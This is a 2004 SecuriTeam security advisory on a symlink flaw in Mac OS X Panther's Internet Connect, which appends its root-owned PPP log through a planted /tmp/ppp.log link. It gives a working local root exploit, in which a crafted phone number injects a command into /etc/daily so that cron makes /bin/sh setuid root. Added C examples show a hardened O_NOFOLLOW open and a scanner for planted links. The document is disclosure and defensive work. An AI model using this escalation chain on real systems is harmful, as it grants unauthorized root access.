[NEWS] Mac OS X Panther Internet Connect Vulnerability

From: SecuriTeam (support_at_securiteam.com)
Date: 07/27/04

    To: list@securiteam.com
    Date: 27 Jul 2004 19:25:39 +0200


    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - - - - - - - -

      Mac OS X Panther Internet Connect Vulnerability
    ------------------------------------------------------------------------

    SUMMARY

    The Internet Connect application in Mac OS X is used to dial in to the
    Internet over a modem. A vulnerability in Internet Connect allows a local,
    unprivileged user to append attacker-controlled data to any file on the
    system, and thereby to gain root privileges.

    DETAILS

    Vulnerable Systems:
     * Panther 10.3.4 - Internet Connect version 1.3 (Possibly others)

    When a connection is started, Internet Connect writes a log file named
    ppp.log in the /tmp directory; the PPP logging runs as root, so the file
    is created owned by root. If the file already exists it is appended to,
    otherwise a new file is created. Because the open follows symbolic
    links, Internet Connect can be tricked into appending its log output to
    any file on the system: the attacker creates a symbolic link named
    /tmp/ppp.log that points at the file to be altered.

    If /tmp/ppp.log already exists as a regular file, the attack is not
    possible, as the file is owned by user 'root' and group 'wheel' and a
    normal user cannot remove or replace it in the sticky /tmp directory.
    However, the operating system clears the /tmp directory at system
    startup and during regular maintenance, so there is a recurring window
    in which no ppp.log exists and an unprivileged user can plant the link
    before the next connection attempt. The attack then proceeds as shown
    below:

    First a file is created to represent a system file, owned and only
    writable by user 'root'.
    maki:~ # echo "TEST" > /etc/file_owned_by_root
    maki:~ # ls -l /etc/file_owned_by_root
    -rw-r--r-- 1 root wheel 5 25 Jul 00:09 /etc/file_owned_by_root
    maki:~ # cat /etc/file_owned_by_root
    TEST

    A symbolic link is now created in the '/tmp' directory pointing to the
    file to be altered. Note that the link can be created by an ordinary
    user who is neither 'admin' nor 'root'.
    maki:/tmp $ id
    uid=502(br00t) gid=502(br00t) groups=502(br00t)
    maki:/tmp $ ln -s /etc/file_owned_by_root ppp.log
    maki:/tmp $ ls -l ./ppp.log
    lrwxr-xr-x 1 root wheel 23 25 Jul 00:11 ./ppp.log@ -> /etc/file_owned_by_root

    Now open Internet Connect. Under 'Configuration' choose 'Other', enter
    some text into the 'Telephone Number' box (B-r00t r0x y3r w0rld!) and
    click 'Connect'. 'Cancel' can be clicked several seconds later.
    Checking the original file '/etc/file_owned_by_root' we see the following:
    maki:~ $ cat /etc/file_owned_by_root
    TEST
    Sun Jul 25 00:20:42 2004 : Version 2.0
    Sun Jul 25 00:20:43 2004 : Dialing B-r00t r0x y3r w0rld!
    Sun Jul 25 00:20:54 2004 : Terminating on signal 15.
    Sun Jul 25 00:20:58 2004 : Serial link disconnected.

    As can be seen, data has been appended to the 'protected' file.
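    The root cause is the open() pattern in the component that writes the
    log. The C below is an added illustration, not part of the advisory or
    of Apple's code: a root process opening a fixed name in a world-writable
    directory with O_CREAT|O_APPEND follows whatever a symlink there points
    at. It reproduces that in a scratch directory (no root needed, nothing
    real is touched) and contrasts it with an open that uses O_NOFOLLOW and
    verifies the descriptor with fstat(). The function names and the scratch
    path /tmp/pppdemo.XXXXXX are assumptions made for the demo.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the advisory describes: a root process appends to a fixed
 * name in a world-writable directory, creating the file if it is absent.
 * open() follows symlinks, so a planted /tmp/ppp.log -> /etc/daily turns
 * the log write into a write to /etc/daily. */
int append_log_vulnerable(const char *path, const char *line)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_APPEND, 0644);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, line, strlen(line));
    close(fd);
    return n == (ssize_t)strlen(line) ? 0 : -1;
}

/* Hardened variant: O_NOFOLLOW makes open() fail with ELOOP if the last
 * path component is a symlink, and the fstat() checks reject a hard link
 * or a foreign file slipped in instead. The checks run on the descriptor
 * we already hold, so there is no lstat()/open() race to exploit. */
int append_log_safe(const char *path, const char *line)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;              /* errno == ELOOP when path is a symlink */
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1
        || st.st_uid != geteuid()) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    ssize_t n = write(fd, line, strlen(line));
    close(fd);
    return n == (ssize_t)strlen(line) ? 0 : -1;
}

/* Constructed scenario mirroring the advisory, in a private scratch
 * directory: a "protected" file, a symlink named ppp.log pointing at it,
 * then one append through `fn`. Returns 1 if the protected file grew,
 * 0 if it is untouched, -1 on setup failure. */
int symlink_attack_succeeds(int (*fn)(const char *, const char *))
{
    char dir[] = "/tmp/pppdemo.XXXXXX";   /* assumed scratch location */
    if (mkdtemp(dir) == NULL)
        return -1;
    char target[128], link[128];
    snprintf(target, sizeof target, "%s/file_owned_by_root", dir);
    snprintf(link, sizeof link, "%s/ppp.log", dir);

    const char *original = "TEST\n";
    int tfd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (tfd < 0 || write(tfd, original, strlen(original)) < 0)
        return -1;
    close(tfd);
    if (symlink(target, link) < 0)
        return -1;

    /* What the logger writes; the attacker controls only the dialed text. */
    fn(link, "Sun Jul 25 00:20:43 2004 : Dialing B-r00t r0x y3r w0rld!\n");

    struct stat st;
    int grew = stat(target, &st) == 0 && st.st_size > (off_t)strlen(original);
    unlink(link);
    unlink(target);
    rmdir(dir);
    return grew;
}

int main(void)
{
    printf("vulnerable append: target modified = %d\n",
           symlink_attack_succeeds(append_log_vulnerable));
    printf("hardened append:   target modified = %d\n",
           symlink_attack_succeeds(append_log_safe));
    return 0;
}
```

    Compile with cc -o pppdemo pppdemo.c and run it: the vulnerable append
    reports 1 (the link was followed and the target grew), the hardened one
    reports 0. O_NOFOLLOW protects only the final path component, so every
    directory above it must be trusted as well; the more robust fix is not
    to log from a privileged process into a world-writable directory at all.
    On Linux the fs.protected_symlinks sysctl blocks this whole class in
    sticky directories such as /tmp; Panther has no equivalent.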

    Impact:
    A local user can escalate their privileges to root by appending data to
    specific system files, for example a script that root executes. In
    addition, a malicious user may be able to render the machine unusable by
    corrupting important system files.

    Exploit:
    This demonstration appends commands to the '/etc/daily' script, which
    cron executes as root at 3:15AM each day by default. An alternative
    attack might involve appending to any of the files that are sourced at
    system start up, such as '/etc/rc.common'. This latter method is
    convenient if the user is able to reboot the machine.

    Create our link:
    maki:~ $ ln -s /etc/daily /tmp/ppp.log

    Open Internet Connect by Internal Modem -> Configuration -> Other

    Internet Connect only allows certain characters to be used for the
    telephone number, and the number is logged after text we do not control
    (a timestamp and the word 'Dialing'). When sh later reads the appended
    line, a leading '&' terminates that uncontrolled prefix as a background
    command (which simply fails), so the command string following it is
    executed on its own. The other appended log lines also fail as commands,
    but, as the transcript below confirms, the script continues past them.
    The chain of 'cd ..' reaches the filesystem root from wherever the
    script runs without needing a '/' in the number.

    Under the Telephone Number field enter:
    & cd .. && cd .. && cd .. && cd .. && cd bin && chmod 4755 sh &

    Click 'Connect', wait about 10 seconds, then press 'Cancel'.

    If we check the content of the '/etc/daily' file:
    maki:~ $ tail /etc/daily
    if [ -f /etc/security ]; then
    echo ""
    echo "Running security:"
    sh /etc/security 2>&1 | sendmail root
    fi
    Sun Jul 25 03:10:11 2004 : Version 2.0
    Sun Jul 25 03:10:11 2004 : Dialing & cd .. && cd .. && cd .. && cd .. && cd bin && chmod 4755 sh &
    Sun Jul 25 03:10:15 2004 : Terminating on signal 15.
    Sun Jul 25 03:10:17 2004 : Serial link disconnected.

    All we need to do now is sit back and wait for cron to execute
    '/etc/daily'.

    maki:~ $ date
    Sun Jul 25 03:13:43 CEST 2004
    maki:~ $ cd /bin
    maki:/bin $ ls -l sh
    -r-xr-xr-x 1 root wheel 603488 25 Jun 09:39 sh*
    maki:/bin $ date
    Sun Jul 25 03:15:50 CEST 2004
    maki:/bin $ ls -l sh
    -rwsr-xr-x 1 root wheel 603488 25 Jun 09:39 sh*
    maki:/bin $ sh
    maki:/bin # id
    uid=502(br00t) euid=0(root) gid=502(br00t) groups=502(br00t)

    All that is left to do is clean up '/etc/daily' and remove the link
    '/tmp/ppp.log'.
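    A check an administrator could run on a Panther box (or on any system
    with a sticky, world-writable /tmp) is to look for links that an
    unprivileged user has planted ahead of a root process. The C scanner
    below is an added example, not part of the advisory: it reports symlinks
    in a directory whose target resolves outside that directory, whose owner
    differs from the target's owner, or which dangle. The demo function
    builds the scenario in scratch paths under /tmp (the paths and function
    names are assumptions) rather than touching the real /tmp/ppp.log.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Walk one world-writable directory and report symlinks that look planted:
 * a link whose target resolves outside the directory, a link whose owner
 * differs from the target's owner (br00t's link pointing at root's file),
 * or a dangling link (a name reserved for a file root will create later).
 * Returns the number of such links, -1 if the directory cannot be read. */
int count_planted_symlinks(const char *dir)
{
    char real_dir[PATH_MAX];
    if (realpath(dir, real_dir) == NULL)
        return -1;
    DIR *d = opendir(dir);
    if (d == NULL)
        return -1;
    size_t dl = strlen(real_dir);
    int found = 0;
    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        char path[PATH_MAX];
        if (snprintf(path, sizeof path, "%s/%s", dir, e->d_name) >= (int)sizeof path)
            continue;
        struct stat ls;
        if (lstat(path, &ls) < 0 || !S_ISLNK(ls.st_mode))
            continue;                       /* only symlinks are of interest */
        char target[PATH_MAX];
        if (realpath(path, target) == NULL) {
            printf("%s: dangling symlink\n", path);
            found++;
            continue;
        }
        /* inside the directory only if the resolved path has it as a prefix
         * followed by a separator */
        int outside = strncmp(target, real_dir, dl) != 0 || target[dl] != '/';
        struct stat ts;
        int foreign_owner = stat(target, &ts) == 0 && ts.st_uid != ls.st_uid;
        if (outside || foreign_owner) {
            printf("%s -> %s (%s)\n", path, target,
                   outside ? "target outside directory" : "owner mismatch");
            found++;
        }
    }
    closedir(d);
    return found;
}

/* Constructed scenario, as in the advisory but in scratch directories: a
 * scan directory holding a benign link to its own file and a planted
 * "ppp.log" link pointing at a file that lives somewhere else. Returns the
 * scanner's count, which should be 1 (only ppp.log is reported). */
int planted_symlink_demo(void)
{
    char scan[] = "/tmp/scandemo.XXXXXX";  /* assumed scratch locations */
    char victim[] = "/tmp/victim.XXXXXX";
    if (mkdtemp(scan) == NULL)
        return -1;
    int vfd = mkstemp(victim);
    if (vfd < 0)
        return -1;
    close(vfd);
    char own[PATH_MAX], benign[PATH_MAX], planted[PATH_MAX];
    snprintf(own, sizeof own, "%s/own.log", scan);
    snprintf(benign, sizeof benign, "%s/benign.lnk", scan);
    snprintf(planted, sizeof planted, "%s/ppp.log", scan);
    int ofd = open(own, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (ofd < 0)
        return -1;
    close(ofd);
    if (symlink(own, benign) < 0 || symlink(victim, planted) < 0)
        return -1;

    int n = count_planted_symlinks(scan);

    unlink(planted);
    unlink(benign);
    unlink(own);
    rmdir(scan);
    unlink(victim);
    return n;
}

int main(void)
{
    printf("planted symlinks found: %d\n", planted_symlink_demo());
    return 0;
}
```

    Point count_planted_symlinks() at /tmp from a periodic job or before
    starting a dial-up session; a link such as /tmp/ppp.log -> /etc/daily
    owned by a non-root user is reported as 'target outside directory'. The
    check is a detection aid, not a fix: it cannot close the race between a
    /tmp clean-up and the next privileged open, which only the logging code
    itself can close.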

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:br00t@blueyonder.co.uk>
    B-r00t.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

